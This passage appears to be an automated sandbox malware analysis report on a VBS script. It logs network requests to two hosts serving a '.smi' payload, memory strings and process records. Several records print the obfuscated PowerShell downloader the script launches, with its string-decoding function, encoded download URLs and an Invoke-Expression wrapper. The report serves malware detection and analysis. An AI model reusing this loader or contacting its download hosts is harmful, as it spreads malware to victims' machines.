      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.almrwad.com
      Source: global trafficDNS traffic detected: DNS query: www.erp-royal-crown.info
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:43:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:43:55 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:44:01 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:44:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:44:12 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:44:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:44:24 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:44:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:44:36 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:44:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:44:48 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:44:53 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:44:59 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:45:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:45:11 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:45:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:45:23 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:45:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:45:35 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:45:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:45:46 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:45:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50C3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50E33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A519B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A512E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5152E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A508EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5042E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://almrwad.com
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50EE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5104C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51513000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50D7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A503E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erp-royal-crown.info
      Source: powershell.exe, 00000001.00000002.3368008516.0000029A5FD44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3368008516.0000029A5FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A4FDBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A4FB91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50C3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50E33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A519B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A512E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5152E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A508EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5042E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.almrwad.com
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A4FDBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50EE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5104C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51513000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50D7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A503E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.erp-royal-crown.info
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A4FB91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000001.00000002.3368008516.0000029A5FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.3368008516.0000029A5FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.3368008516.0000029A5FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A4FDBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.3368008516.0000029A5FD44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3368008516.0000029A5FC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50E33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A512E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5152E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50B9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A508EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5042E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A4FDBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A4FDBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.smi
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A506B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50EE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A501F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A5104C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A50D7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3347944576.0000029A51503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info
      Source: powershell.exe, 00000001.00000002.3347944576.0000029A4FDBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiX
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.5:49706 version: TLS 1.2

      System Summary

      barindex
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
      Source: script.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173Jump to behavior
      Source: classification engineClassification label: mal100.expl.evad.winVBS@6/3@2/2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Succesfulde.bloJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3vvls3d.ffp.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\script.vbs"
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: script.vbsReversingLabs: Detection: 28%
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\script.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G 